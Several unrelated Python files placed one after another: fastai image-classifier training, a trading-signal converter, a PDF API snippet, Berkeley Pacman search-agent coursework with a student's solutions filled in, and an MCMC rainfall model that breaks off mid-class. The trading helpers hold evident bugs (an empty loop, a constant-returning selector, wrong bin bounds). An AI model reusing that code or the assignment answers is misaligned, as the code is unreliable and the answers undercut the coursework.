results = search_images_bing(key, f'{o}')
download_images(dest, urls=results.attrgot('contentUrl'), max_pics=1000)
print(f"\r{c}{o}", end="")
c+=1
fns = get_image_files(path)
print(fns)
failed = verify_images(fns)
print(failed)
failed.map(Path.unlink)
pokemon = DataBlock(
blocks=(ImageBlock, CategoryBlock),
get_items=get_image_files,
splitter=RandomSplitter(valid_pct=0.2, seed=42),
get_y=parent_label,
item_tfms=Resize(256))
dls = pokemon.dataloaders(path)
dls.valid.show_batch(max_n=10, nrows=1)
pokemon = pokemon.new(item_tfms=RandomResizedCrop(128, min_scale=.2), batch_tfms=aug_transforms(mult=3))
dls = pokemon.dataloaders(path)
dls.train.show_batch(max_n=8, nrows=2, unique=True)
pokemon= pokemon.new(item_tfms=RandomResizedCrop(256, min_scale=0.2),batch_tfms=aug_transforms(mult=3))
dls = pokemon.dataloaders(path)
learn = cnn_learner(dls, resnet101 , metrics=error_rate)
learn.fine_tune(16)
interp = ClassificationInterpretation.from_learner(learn)
interp.plot_confusion_matrix()
interp.plot_top_losses(5, nrows=1)
cleaner = ImageClassifierCleaner(learn)
for idx in cleaner.delete():
try:
cleaner.fns[idx].unlink()
except:
pass
for idx,cat in cleaner.change(): shutil.move(str(cleaner.fns[idx]), path/cat)
learn.export(path/'export.pkl')
|
# -*- coding: utf-8 -*-
import numpy as np
def signal_to_class(data, n=2, normalize=True):
"""
Converts a list of signals to a n-dimensional list of classes [buy, .., sell].
Arguments
n (int): Number of classes.
normalize (bool): It normalizes to unity. False - the signal changes only the sign.
Returns
Array of classes.
"""
result = np.array([])
data = np.array(data)
if len(data.shape) > 1:
raise ValueError("The array must be one-dimensional.")
if n == 2:
if normalize:
for item in data:
if item > 0: # buy
result = np.append(result, [1.0, 0.0])
if item <= 0: # sell
result = np.append(result, [0.0, 1.0])
else:
for item in data:
result = np.append(result, [0.5+item/2.0, 0.5-item/2.0])
elif n == 3:
if normalize:
for item in data:
if item > 0: # buy
result = np.append(result, [1.0, 0.0, 0.0])
if item < 0: # sell
result = np.append(result, [0.0, 0.0, 1.0])
if item == 0: # pass
result = np.append(result, [0.0, 1.0, 0.0])
else:
for item in data:
if item > 0: # buy
result = np.append(result, [abs(item), (1.0-abs(item)), 0.0])
if item < 0: # sell
result = np.append(result, [0.0, (1.0-abs(item)), abs(item)])
if item == 0: # pass
result = np.append(result, [0.0, 1.0, 0.0])
elif n == 6:
for item in data:
if item >= 0.8 and item <= 1.0:
result = np.append(result, [1.0, 0.0, 0.0, 0.0, 0.0, 0.0])
elif item >= 0.4 and item < 0.8:
result = np.append(result, [0.0, 1.0, 0.0, 0.0, 0.0, 0.0])
elif item >= 0.0 and item < 0.4:
result = np.append(result, [0.0, 0.0, 1.0, 0.0, 0.0, 0.0])
elif item > -0.4 and item < 0.0:
result = np.append(result, [0.0, 0.0, 0.0, 1.0, 0.0, 0.0])
elif item > -0.8 and item <= 0.4:
result = np.append(result, [0.0, 0.0, 0.0, 0.0, 1.0, 0.0])
elif item >= -1.0 and item <= 0.8:
result = np.append(result, [0.0, 0.0, 0.0, 0.0, 0.0, 1.0])
return result.reshape((data.shape[0], n))
def class_to_signal(data, n=2, normalized=True):
"""
Converts a n-dimensional list of classes to a list of signals.
"""
result = np.array([])
if n == 2:
if normalized:
for item in data:
result = np.append(result, 1 if item[0] > item[1] else -1)
else:
for item in data:
result = np.append(result, item[0] * 2 - 1.0)
elif n == 3:
if normalized:
for item in data:
_class = np.argmax(item)
if _class == 0:
result = np.append(result, 1.0)
elif _class == 1:
result = np.append(result, 0.0)
elif _class == 2:
result = np.append(result, -1.0)
else:
for item in data:
_class = np.argmax(item)
if _class == 0:
result = np.append(result, item[0])
elif _class == 1:
result = np.append(result, 0.0)
elif _class == 2:
result = np.append(result, -item[2])
elif n == 6:
for item in data:
_class = np.argmax(item)
if _class == 0:
result = np.append(result, 1.0)
elif _class == 1:
result = np.append(result, 0.66)
elif _class == 2:
result = np.append(result, 0.33)
elif _class == 3:
result = np.append(result, -0.33)
elif _class == 4:
result = np.append(result, -0.66)
elif _class == 5:
result = np.append(result, -1.0)
return result
def prepare_target(data, close_index=3, classes=6):
"""
Hello (=
uniform classes
"""
# TODO
# while const
classes = 6
data = np.array(data)
new_target = data[1:, close_index] / data[:-1, close_index]
new_target = np.insert(new_target, obj=0, values=[1.0])
n, bins = np.histogram(new_target, bins=200, range=(0.99, 1.01))
sixth = sum(n) / classes
points = [0., 0., 1., 0., 0.]
_sum = n[100]/2
p_idx = 1
for idx in range(99, -1):
_sum += n[idx]
if _sum >= sixth:
points[p_idx] = (idx - 100) / 10**4 + 1
p_idx -= 1
if p_idx < 0:
break
_sum = n[100]/2
p_idx = 3
for idx in range(101, 201):
_sum += n[idx]
if _sum >= sixth:
points[p_idx] = (idx - 100) / 10**4 + 1
p_idx += 1
if p_idx > 4:
break
# TODO
def select(a):
a > points[2]
return 1
new_target = [select(x) for x in new_target]
return new_target
|
from configuration import *
file_name = 'PdfWithAnnotations.pdf'
uploadFile(file_name)
response = pdf_api.get_document_file_attachment_annotations(
file_name, folder=temp_folder)
pprint(response)
|
# searchAgents.py
# ---------------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
"""
This file contains all of the agents that can be selected to control Pacman. To
select an agent, use the '-p' option when running pacman.py. Arguments can be
passed to your agent using '-a'. For example, to load a SearchAgent that uses
depth first search (dfs), run the following command:
> python pacman.py -p SearchAgent -a fn=depthFirstSearch
Commands to invoke other search strategies can be found in the project
description.
Please only change the parts of the file you are asked to. Look for the lines
that say
"*** YOUR CODE HERE ***"
The parts you fill in start about 3/4 of the way down. Follow the project
description for details.
Good luck and happy searching!
"""
from game import Directions
from game import Agent
from game import Actions
import util
import time
import search
class GoWestAgent(Agent):
"An agent that goes West until it can't."
def getAction(self, state):
"The agent receives a GameState (defined in pacman.py)."
if Directions.WEST in state.getLegalPacmanActions():
return Directions.WEST
else:
return Directions.STOP
#######################################################
# This portion is written for you, but will only work #
# after you fill in parts of search.py #
#######################################################
class SearchAgent(Agent):
"""
This very general search agent finds a path using a supplied search
algorithm for a supplied search problem, then returns actions to follow that
path.
As a default, this agent runs DFS on a PositionSearchProblem to find
location (1,1)
Options for fn include:
depthFirstSearch or dfs
breadthFirstSearch or bfs
Note: You should NOT change any code in SearchAgent
"""
def __init__(self, fn='depthFirstSearch', prob='PositionSearchProblem', heuristic='nullHeuristic'):
# Warning: some advanced Python magic is employed below to find the right functions and problems
# Get the search function from the name and heuristic
if fn not in dir(search):
raise AttributeError(fn + ' is not a search function in search.py.')
func = getattr(search, fn)
if 'heuristic' not in func.__code__.co_varnames:
print('[SearchAgent] using function ' + fn)
self.searchFunction = func
else:
if heuristic in globals().keys():
heur = globals()[heuristic]
elif heuristic in dir(search):
heur = getattr(search, heuristic)
else:
raise AttributeError(heuristic + ' is not a function in searchAgents.py or search.py.')
print('[SearchAgent] using function %s and heuristic %s' % (fn, heuristic))
# Note: this bit of Python trickery combines the search algorithm and the heuristic
self.searchFunction = lambda x: func(x, heuristic=heur)
# Get the search problem type from the name
if prob not in globals().keys() or not prob.endswith('Problem'):
raise AttributeError(prob + ' is not a search problem type in SearchAgents.py.')
self.searchType = globals()[prob]
print('[SearchAgent] using problem type ' + prob)
def registerInitialState(self, state):
"""
This is the first time that the agent sees the layout of the game
board. Here, we choose a path to the goal. In this phase, the agent
should compute the path to the goal and store it in a local variable.
All of the work is done in this method!
state: a GameState object (pacman.py)
"""
if self.searchFunction == None: raise Exception("No search function provided for SearchAgent")
starttime = time.time()
problem = self.searchType(state) # Makes a new search problem
self.actions = self.searchFunction(problem) # Find a path
totalCost = problem.getCostOfActions(self.actions)
print('Path found with total cost of %d in %.1f seconds' % (totalCost, time.time() - starttime))
if '_expanded' in dir(problem): print('Search nodes expanded: %d' % problem._expanded)
def getAction(self, state):
"""
Returns the next action in the path chosen earlier (in
registerInitialState). Return Directions.STOP if there is no further
action to take.
state: a GameState object (pacman.py)
"""
if 'actionIndex' not in dir(self): self.actionIndex = 0
i = self.actionIndex
self.actionIndex += 1
if i < len(self.actions):
return self.actions[i]
else:
return Directions.STOP
class PositionSearchProblem(search.SearchProblem):
"""
A search problem defines the state space, start state, goal test, successor
function and cost function. This search problem can be used to find paths
to a particular point on the pacman board.
The state space consists of (x,y) positions in a pacman game.
Note: this search problem is fully specified; you should NOT change it.
"""
def __init__(self, gameState, costFn = lambda x: 1, goal=(1,1), start=None, warn=True, visualize=True):
"""
Stores the start and goal.
gameState: A GameState object (pacman.py)
costFn: A function from a search state (tuple) to a non-negative number
goal: A position in the gameState
"""
self.walls = gameState.getWalls()
self.startState = gameState.getPacmanPosition()
if start != None: self.startState = start
self.goal = goal
self.costFn = costFn
self.visualize = visualize
if warn and (gameState.getNumFood() != 1 or not gameState.hasFood(*goal)):
print('Warning: this does not look like a regular search maze')
# For display purposes
self._visited, self._visitedlist, self._expanded = {}, [], 0 # DO NOT CHANGE
def getStartState(self):
return self.startState
def isGoalState(self, state):
isGoal = state == self.goal
# For display purposes only
if isGoal and self.visualize:
self._visitedlist.append(state)
import __main__
if '_display' in dir(__main__):
if 'drawExpandedCells' in dir(__main__._display): #@UndefinedVariable
__main__._display.drawExpandedCells(self._visitedlist) #@UndefinedVariable
return isGoal
def getSuccessors(self, state):
"""
Returns successor states, the actions they require, and a cost of 1.
As noted in search.py:
For a given state, this should return a list of triples,
(successor, action, stepCost), where 'successor' is a
successor to the current state, 'action' is the action
required to get there, and 'stepCost' is the incremental
cost of expanding to that successor
"""
successors = []
for action in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:
x,y = state
dx, dy = Actions.directionToVector(action)
nextx, nexty = int(x + dx), int(y + dy)
if not self.walls[nextx][nexty]:
nextState = (nextx, nexty)
cost = self.costFn(nextState)
successors.append( ( nextState, action, cost) )
# Bookkeeping for display purposes
self._expanded += 1 # DO NOT CHANGE
if state not in self._visited:
self._visited[state] = True
self._visitedlist.append(state)
return successors
def getCostOfActions(self, actions):
"""
Returns the cost of a particular sequence of actions. If those actions
include an illegal move, return 999999.
"""
if actions == None: return 999999
x,y= self.getStartState()
cost = 0
for action in actions:
# Check figure out the next state and see whether its' legal
dx, dy = Actions.directionToVector(action)
x, y = int(x + dx), int(y + dy)
if self.walls[x][y]: return 999999
cost += self.costFn((x,y))
return cost
class StayEastSearchAgent(SearchAgent):
"""
An agent for position search with a cost function that penalizes being in
positions on the West side of the board.
The cost function for stepping into a position (x,y) is 1/2^x.
"""
def __init__(self):
self.searchFunction = search.uniformCostSearch
costFn = lambda pos: .5 ** pos[0]
self.searchType = lambda state: PositionSearchProblem(state, costFn, (1, 1), None, False)
class StayWestSearchAgent(SearchAgent):
"""
An agent for position search with a cost function that penalizes being in
positions on the East side of the board.
The cost function for stepping into a position (x,y) is 2^x.
"""
def __init__(self):
self.searchFunction = search.uniformCostSearch
costFn = lambda pos: 2 ** pos[0]
self.searchType = lambda state: PositionSearchProblem(state, costFn)
def manhattanHeuristic(position, problem, info={}):
"The Manhattan distance heuristic for a PositionSearchProblem"
xy1 = position
xy2 = problem.goal
return abs(xy1[0] - xy2[0]) + abs(xy1[1] - xy2[1])
def euclideanHeuristic(position, problem, info={}):
"The Euclidean distance heuristic for a PositionSearchProblem"
xy1 = position
xy2 = problem.goal
return ( (xy1[0] - xy2[0]) ** 2 + (xy1[1] - xy2[1]) ** 2 ) ** 0.5
#####################################################
# This portion is incomplete. Time to write code! #
#####################################################
class CornersProblem(search.SearchProblem):
"""
This search problem finds paths through all four corners of a layout.
You must select a suitable state space and successor function
"""
def __init__(self, startingGameState):
"""
Stores the walls, pacman's starting position and corners.
"""
self.walls = startingGameState.getWalls()
self.startingPosition = startingGameState.getPacmanPosition()
top, right = self.walls.height-2, self.walls.width-2
self.corners = ((1,1), (1,top), (right, 1), (right, top))
for corner in self.corners:
if not startingGameState.hasFood(*corner):
print('Warning: no food in corner ' + str(corner))
self._expanded = 0 # DO NOT CHANGE; Number of search nodes expanded
# Please add any code here which you would like to use
# in initializing the problem
"*** YOUR CODE HERE ***"
# print(self.startingPosition)
self.startingGameState= startingGameState
self.startState = (self.startingPosition, [])
def getStartState(self):
"""
Returns the start state (in your state space, not the full Pacman state
space)
"""
"*** YOUR CODE HERE ***"
return self.startState
def isGoalState(self, state):
"""
Returns whether this search state is a goal state of the problem.
"""
"*** YOUR CODE HERE ***"
if state[0] in self.corners:
if len(state[1])== len(self.corners):
return True
return False
def getSuccessors(self, state):
"""
Returns successor states, the actions they require, and a cost of 1.
As noted in search.py:
For a given state, this should return a list of triples, (successor,
action, stepCost), where 'successor' is a successor to the current
state, 'action' is the action required to get there, and 'stepCost'
is the incremental cost of expanding to that successor
"""
successors = []
for action in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:
# Add a successor state to the successor list if the action is legal
# Here's a code snippet for figuring out whether a new position hits a wall:
# x,y = currentPosition
# dx, dy = Actions.directionToVector(action)
# nextx, nexty = int(x + dx), int(y + dy)
# hitsWall = self.walls[nextx][nexty]
"*** YOUR CODE HERE ***"
# Copied from the getSuccessors function of PositionSearchProblem class
x,y=state[0]
dx, dy = Actions.directionToVector(action)
nextx, nexty = int(x + dx), int(y + dy)
if not self.walls[nextx][nexty]:
next = (nextx, nexty)
if next in self.corners:
if next not in state[1]:
successors.append(((next, state[1]+[next]), action, 1))
successors.append(((next,state[1]), action, 1))
self._expanded += 1 # DO NOT CHANGE
return successors
def getCostOfActions(self, actions):
"""
Returns the cost of a particular sequence of actions. If those actions
include an illegal move, return 999999. This is implemented for you.
"""
if actions == None: return 999999
x,y= self.startingPosition
for action in actions:
dx, dy = Actions.directionToVector(action)
x, y = int(x + dx), int(y + dy)
if self.walls[x][y]: return 999999
return len(actions)
def cornersHeuristic(state, problem):
"""
A heuristic for the CornersProblem that you defined.
state: The current search state
(a data structure you chose in your search problem)
problem: The CornersProblem instance for this layout.
This function should always return a number that is a lower bound on the
shortest path from the state to a goal of the problem; i.e. it should be
admissible (as well as consistent).
"""
corners = problem.corners # These are the corner coordinates
walls = problem.walls # These are the walls of the maze, as a Grid (game.py)
# print(corners)
# print(walls)
# print(state)
"*** YOUR CODE HERE ***"
# The heuristic here defined was the maximum distance between a unclosed corner from the current state is equal or less than the sum of the distance of an another corner from current state and the distance between the corners
# which means any edge in a triangle has to be equal or less then sum of rest of the edges: h(s)<= c(s,n)+h(n))
current, closed = state
open =set(corners)-set(closed)
open = list(open)
size =[]
if not open:
return 0
if len(open) == 1:
return mazeDistance(current, open[0], problem.startingGameState)
for corner in open:
size.append(mazeDistance(current, corner, problem.startingGameState))
index1=size.index(max(size))
start1 = open[index1]
distance_goal1=max(size)
open.pop(index1)
size.clear()
for corner in open:
size.append(mazeDistance(start1, corner, problem.startingGameState))
index2=size.index(max(size))
distance_goal2=mazeDistance(current,open[index2],problem.startingGameState)
distance_goal3=max(size)
if distance_goal1>distance_goal2:
return distance_goal3+distance_goal2
return distance_goal3+distance_goal1
class AStarCornersAgent(SearchAgent):
"A SearchAgent for FoodSearchProblem using A* and your foodHeuristic"
def __init__(self):
self.searchFunction = lambda prob: search.aStarSearch(prob, cornersHeuristic)
self.searchType = CornersProblem
class FoodSearchProblem:
"""
A search problem associated with finding the a path that collects all of the
food (dots) in a Pacman game.
A search state in this problem is a tuple ( pacmanPosition, foodGrid ) where
pacmanPosition: a tuple (x,y) of integers specifying Pacman's position
foodGrid: a Grid (see game.py) of either True or False, specifying remaining food
"""
def __init__(self, startingGameState):
self.start = (startingGameState.getPacmanPosition(), startingGameState.getFood())
self.walls = startingGameState.getWalls()
self.startingGameState = startingGameState
self._expanded = 0 # DO NOT CHANGE
self.heuristicInfo = {} # A dictionary for the heuristic to store information
def getStartState(self):
return self.start
def isGoalState(self, state):
return state[1].count() == 0
def getSuccessors(self, state):
"Returns successor states, the actions they require, and a cost of 1."
successors = []
self._expanded += 1 # DO NOT CHANGE
for direction in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:
x,y = state[0]
dx, dy = Actions.directionToVector(direction)
nextx, nexty = int(x + dx), int(y + dy)
if not self.walls[nextx][nexty]:
nextFood = state[1].copy()
nextFood[nextx][nexty] = False
successors.append( ( ((nextx, nexty), nextFood), direction, 1) )
return successors
def getCostOfActions(self, actions):
"""Returns the cost of a particular sequence of actions. If those actions
include an illegal move, return 999999"""
x,y= self.getStartState()[0]
cost = 0
for action in actions:
# figure out the next state and see whether it's legal
dx, dy = Actions.directionToVector(action)
x, y = int(x + dx), int(y + dy)
if self.walls[x][y]:
return 999999
cost += 1
return cost
class AStarFoodSearchAgent(SearchAgent):
"A SearchAgent for FoodSearchProblem using A* and your foodHeuristic"
def __init__(self):
self.searchFunction = lambda prob: search.aStarSearch(prob, foodHeuristic)
self.searchType = FoodSearchProblem
def foodHeuristic(state, problem):
"""
Your heuristic for the FoodSearchProblem goes here.
This heuristic must be consistent to ensure correctness. First, try to come
up with an admissible heuristic; almost all admissible heuristics will be
consistent as well.
If using A* ever finds a solution that is worse uniform cost search finds,
your heuristic is *not* consistent, and probably not admissible! On the
other hand, inadmissible or inconsistent heuristics may find optimal
solutions, so be careful.
The state is a tuple ( pacmanPosition, foodGrid ) where foodGrid is a Grid
(see game.py) of either True or False. You can call foodGrid.asList() to get
a list of food coordinates instead.
If you want access to info like walls, capsules, etc., you can query the
problem. For example, problem.walls gives you a Grid of where the walls
are.
If you want to *store* information to be reused in other calls to the
heuristic, there is a dictionary called problem.heuristicInfo that you can
use. For example, if you only want to count the walls once and store that
value, try: problem.heuristicInfo['wallCount'] = problem.walls.count()
Subsequent calls to this heuristic can access
problem.heuristicInfo['wallCount']
"""
position, foodGrid = state
"*** YOUR CODE HERE ***"
# Copied from the cornersproblem huristic function
open = foodGrid.asList()
size =[]
if not open:
return 0
if len(open) == 1:
return mazeDistance(position, open[0], problem.startingGameState)
for corner in open:
size.append(mazeDistance(position, corner, problem.startingGameState))
index1=size.index(max(size))
start1 = open[index1]
distance_goal1=mazeDistance(position,start1,problem.startingGameState)
open.pop(index1)
size.clear()
for corner in open:
size.append(mazeDistance(start1, corner, problem.startingGameState))
index2=size.index(max(size))
distance_goal2=mazeDistance(position,open[index2],problem.startingGameState)
distance_goal3=mazeDistance(start1,open[index2],problem.startingGameState)
if distance_goal1>distance_goal2:
return distance_goal3+distance_goal2
return distance_goal3+distance_goal1
class ClosestDotSearchAgent(SearchAgent):
"Search for all food using a sequence of searches"
def registerInitialState(self, state):
self.actions = []
currentState = state
while(currentState.getFood().count() > 0):
nextPathSegment = self.findPathToClosestDot(currentState) # The missing piece
self.actions += nextPathSegment
for action in nextPathSegment:
legal = currentState.getLegalActions()
if action not in legal:
t = (str(action), str(currentState))
raise Exception('findPathToClosestDot returned an illegal move: %s!\n%s' % t)
currentState = currentState.generateSuccessor(0, action)
self.actionIndex = 0
print('Path found with cost %d.' % len(self.actions))
def findPathToClosestDot(self, gameState):
"""
Returns a path (a list of actions) to the closest dot, starting from
gameState.
"""
# Here are some useful elements of the startState
startPosition = gameState.getPacmanPosition()
food = gameState.getFood()
walls = gameState.getWalls()
problem = AnyFoodSearchProblem(gameState)
"*** YOUR CODE HERE ***"
# Return of any search problem except the dfs it can find its way in an efficient manner.
return search.ucs(problem)
class AnyFoodSearchProblem(PositionSearchProblem):
"""
A search problem for finding a path to any food.
This search problem is just like the PositionSearchProblem, but has a
different goal test, which you need to fill in below. The state space and
successor function do not need to be changed.
The class definition above, AnyFoodSearchProblem(PositionSearchProblem),
inherits the methods of the PositionSearchProblem.
You can use this search problem to help you fill in the findPathToClosestDot
method.
"""
def __init__(self, gameState):
"Stores information from the gameState. You don't need to change this."
# Store the food for later reference
self.food = gameState.getFood()
# Store info for the PositionSearchProblem (no need to change this)
self.walls = gameState.getWalls()
self.startState = gameState.getPacmanPosition()
self.costFn = lambda x: 1
self._visited, self._visitedlist, self._expanded = {}, [], 0 # DO NOT CHANGE
def isGoalState(self, state):
"""
The state is Pacman's position. Fill this in with a goal test that will
complete the problem definition.
"""
x,y = state
"*** YOUR CODE HERE ***"
if (x,y) in self.food.asList():
return True
return False
def mazeDistance(point1, point2, gameState):
"""
Returns the maze distance between any two points, using the search functions
you have already built. The gameState can be any game state -- Pacman's
position in that state is ignored.
Example usage: mazeDistance( (2,4), (5,6), gameState)
This might be a useful helper function for your ApproximateSearchAgent.
"""
x1, y1 = point1
x2, y2 = point2
walls = gameState.getWalls()
assert not walls[x1][y1], 'point1 is a wall: ' + str(point1)
assert not walls[x2][y2], 'point2 is a wall: ' + str(point2)
prob = PositionSearchProblem(gameState, start=point1, goal=point2, warn=False, visualize=False)
return len(search.bfs(prob))
|
from os import path
import matplotlib.pyplot as plt
import numpy as np
from compound_poisson import mcmc
from compound_poisson import time_series
from compound_poisson.mcmc import target_time_series
class TimeSeriesMcmc(time_series.TimeSeries):
"""Fit Compound Poisson time series using Rwmh from a Bayesian setting
Method uses Metropolis Hastings within Gibbs. Sample either the z or the
regression parameters. Uniform prior on z, Normal prior on the
regression parameters. Adaptive MCMC from Roberts and Rosenthal (2009)
For more attributes, see the superclass
Attributes:
n_sample: number of MCMC samples
parameter_target: wrapper Target object to evaluate the posterior of
the parameters
parameter_mcmc: Mcmc object which does MCMC using parameter_target
z_target: wrapper Target object to evaluate the posterior of z
z_mcmc: Mcmc object which does MCMC using z_target
gibbs_weight: up to a constant, probability of sampling each mcmc in
self.get_mcmc_array()
burn_in: integer, which samples to discard when doing posterior
sampling which is used for forecasting
memmap_dir: directory to store the MCMC samples
set_from_mcmc: boolean, True if to automatically randomly set from
MCMC samples
"""
def __init__(self,
x,
rainfall=None,
poisson_rate_n_arma=None,
gamma_mean_n_arma=None,
cp_parameter_array=None):
super().__init__(x,
rainfall,
poisson_rate_n_arma,
gamma_mean_n_arma,
cp_parameter_array)
self.n_sample = 50000
self.parameter_target = target_time_series.TargetParameter(self)
self.parameter_mcmc = None
self.z_target = target_time_series.TargetZ(self)
self.z_mcmc = None
self.gibbs_weight = [0.003*len(self), 1]
self.burn_in = 0
self.memmap_dir = ""
self.set_from_mcmc = True
def fit(self):
"""Fit using Gibbs sampling
Override - Gibbs sample either z, regression parameters or the
precision.
"""
self.initalise_z()
self.instantiate_mcmc()
mcmc_array = self.get_mcmc_array()
mcmc.do_gibbs_sampling(
mcmc_array, self.n_sample, self.rng, self.gibbs_weight)
def resume_fitting(self, n_sample):
"""Run more MCMC samples
Args:
n_sample: new number of mcmc samples
"""
if n_sample > self.n_sample:
mcmc_array = self.get_mcmc_array()
for mcmc_i in mcmc_array:
mcmc_i.extend_memmap(n_sample)
# in resume, do not use initial value as sample (False in arg 3)
mcmc.do_gibbs_sampling(
mcmc_array, n_sample - self.n_sample, self.rng,
self.gibbs_weight, False)
self.n_sample = n_sample
self.delete_old_memmap()
def initalise_z(self):
"""Initalise all z in self.z_array and update all parameters
Initalise all z in self.z_array using e_step() and update all
parameters using update_all_cp_parameters(). Required for e.g.
likelihood evaluation because z=0 if and only if y=0.
"""
self.e_step() # initalise the z using the E step
self.z_array = self.z_array.round() # round it to get integer
# z cannot be 0 if y is not 0
self.z_array[np.logical_and(self.z_array == 0, self.y_array > 0)] = 1
self.update_all_cp_parameters() # initalse cp parameters
def instantiate_mcmc(self):
"""Instantiate all MCMC objects
Instantiate all MCMC objects by passing the corresponding Target
objects and random number generators
"""
self.parameter_mcmc = mcmc.Rwmh(
self.parameter_target, self.rng, self.n_sample, self.memmap_dir)
self.z_mcmc = mcmc.ZRwmh(
self.z_target, self.rng, self.n_sample, self.memmap_dir)
def get_mcmc_array(self):
"""Return array of Mcmc objects
Each element in this array can be called to do a Gibbs step for
different components
"""
mcmc_array = [
self.z_mcmc,
self.parameter_mcmc,
]
return mcmc_array
def set_burn_in(self, burn_in):
self.burn_in = burn_in
def set_parameter_from_sample(self, rng):
"""Set parameter from MCMC sample
Set the regression parameters and latent variables z from the MCMC
samples in parameter_sample and z_sample.
"""
index = rng.randint(self.burn_in, len(self.parameter_mcmc))
self.set_parameter_from_sample_i(index)
self.update_all_cp_parameters()
def set_parameter_from_sample_i(self, index):
"""Set parameter for a specified MCMC sample
"""
self.set_parameter_vector(self.parameter_mcmc[index])
self.z_array = self.z_mcmc[index]
# override
def forecast_self(self, n_simulation):
self.read_memmap()
super().forecast_self(n_simulation)
self.del_memmap()
def instantiate_forecast_self(self):
"""Override - Set the parameter from the MCMC sample
"""
if self.set_from_mcmc:
self.set_parameter_from_sample(self.self_forecaster_rng)
forecast = super().instantiate_forecast_self()
return forecast
# override
def forecast(self, x, n_simulation):
self.read_memmap()
super().forecast(x, n_simulation)
self.del_memmap()
# override
def instantiate_forecast(self, x):
"""Override - Set the parameter from the MCMC sample
"""
if self.set_from_mcmc:
self.set_parameter_from_sample(self.forecaster_rng)
forecast = super().instantiate_forecast(x)
return forecast
def simulate_from_prior(self):
"""Simulate using a parameter from the prior
MODIFIES ITSELF
Replaces the parameter with a sample from the prior. The prior mean and
prior covariance unmodified.
"""
# keep sampling until the sampled parameter does not have numerical
# problems
while True:
try:
# sample from the prior and set it
prior_parameter = self.simulate_parameter_from_prior()
self.set_parameter_vector(prior_parameter)
self.simulate()
# check if any of the parameters are not nan
if np.any(np.isnan(self.poisson_rate.value_array)):
pass
elif np.any(np.isnan(self.gamma_mean.value_array)):
pass
elif np.any(np.isnan(self.gamma_dispersion.value_array)):
pass
else:
break
# try again if there are numerical problems
except(ValueError, OverflowError):
pass
def simulate_parameter_from_prior(self):
"""Simulate parameter from the prior
Return a sample from the prior
"""
return self.parameter_target.simulate_from_prior(self.rng)
def read_memmap(self):
"""Read all memmap file handling from all MCMCs
"""
for mcmc_i in self.get_mcmc_array():
mcmc_i.read_memmap()
def read_to_write_memmap(self):
for mcmc_i in self.get_mcmc_array():
mcmc_i.read_to_write_memmap()
def del_memmap(self):
for mcmc_i in self.get_mcmc_array():
mcmc_i.del_memmap()
def delete_old_memmap(self):
for mcmc_i in self.get_mcmc_array():
mcmc_i.delete_old_memmap()
def print_mcmc(self, directory, true_parameter=None):
parameter_name = self.get_parameter_vector_name()
self.read_memmap()
chain = np.asarray(self.parameter_mcmc[:])
for i in range(self.n_parameter):
chain_i = chain[:, i]
plt.figure()
plt.plot(chain_i)
if true_parameter is not None:
plt.hlines(true_parameter[i], 0, len(chain)-1)
plt.ylabel(parameter_name[i])
plt.xlabel("Sample number")
plt.savefig(
path.join(directory, "chain_parameter_" + str(i) + ".pdf"))
plt.close()
chain = []
z_chain = np.asarray(self.z_mcmc[:])
chain = np.mean(z_chain, 1)
plt.figure()
plt.plot(chain)
plt.ylabel("Mean of latent variables")
plt.xlabel("Sample number")
plt.savefig(path.join(directory, "chain_z.pdf"))
plt.close()
self.print_chain_property(directory)
self.del_memmap()
def print_chain_property(self, directory):
plt.figure()
plt.plot(np.asarray(self.parameter_mcmc.accept_array))
plt.ylabel("Acceptance rate of parameters")
plt.xlabel("Parameter sample number")
plt.savefig(path.join(directory, "accept_parameter.pdf"))
plt.close()
plt.figure()
plt.plot(np.asarray(self.z_mcmc.accept_array))
plt.ylabel("Acceptance self of latent variables")
plt.xlabel("Latent variable sample number")
plt.savefig(path.join(directory, "accept_z.pdf"))
plt.close()
class TimeSeriesSlice(TimeSeriesMcmc):
"""Fit Compound Poisson time series using slice sampling from a Bayesian
setting
Method uses slice within Gibbs. Sample either the z or the
regression parameters. Uniform prior on z, Normal prior on the
regression parameters. Sample z using slice sampling (Neal, 2003).
Sampling the parameters using elliptical slice sampling (Murray 2010).
For more attributes, see the superclass
"""
def __init__(self,
x,
rainfall=None,
poisson_rate_n_arma=None,
gamma_mean_n_arma=None,
cp_parameter_array=None):
super().__init__(x,
rainfall,
poisson_rate_n_arma,
gamma_mean_n_arma,
cp_parameter_array)
self.n_sample = 10000
def instantiate_mcmc(self):
"""Instantiate all MCMC objects
Override
Instantiate slice sampling for the parameter and z
"""
self.parameter_mcmc = mcmc.Elliptical(
self.parameter_target, self.rng, self.n_sample, self.memmap_dir)
self.z_mcmc = mcmc.ZSlice(
self.z_target, self.rng, self.n_sample, self.memmap_dir)
def print_chain_property(self, directory):
plt.figure()
plt.plot(np.asarray(self.parameter_mcmc.n_reject_array))
plt.ylabel("Number of rejects in parameter slicing")
plt.xlabel("Parameter sample number")
plt.savefig(path.join(directory, "n_reject_parameter.pdf"))
plt.close()
plt.figure()
plt.plot(np.asarray(self.z_mcmc.slice_width_array))
plt.ylabel("Latent variable slice width")
plt.xlabel("Latent variable sample number")
plt.savefig(path.join(directory, "slice_width_z.pdf"))
plt.close()
class TimeSeriesHyperSlice(TimeSeriesSlice):
"""Fit Compound Poisson time series using slice sampling with a prior on
the precision
Method uses slice within Gibbs. Uniform prior on z, Normal prior on the
regression parameters, Gamma prior on the precision of the covariance
of the Normal prior. Gibbs sample either z, regression parameters or
the precision. Sample z using slice sampling (Neal, 2003). Sampling the
parameters using elliptical slice sampling (Murray 2010).
For more attributes, see the superclass
Attributes:
precision_target: wrapper Target object with evaluates the posterior of
the precision
precision_mcmc: Mcmc object for precision_target
"""
def __init__(self,
x,
rainfall=None,
poisson_rate_n_arma=None,
gamma_mean_n_arma=None,
cp_parameter_array=None):
super().__init__(x,
rainfall,
poisson_rate_n_arma,
gamma_mean_n_arma,
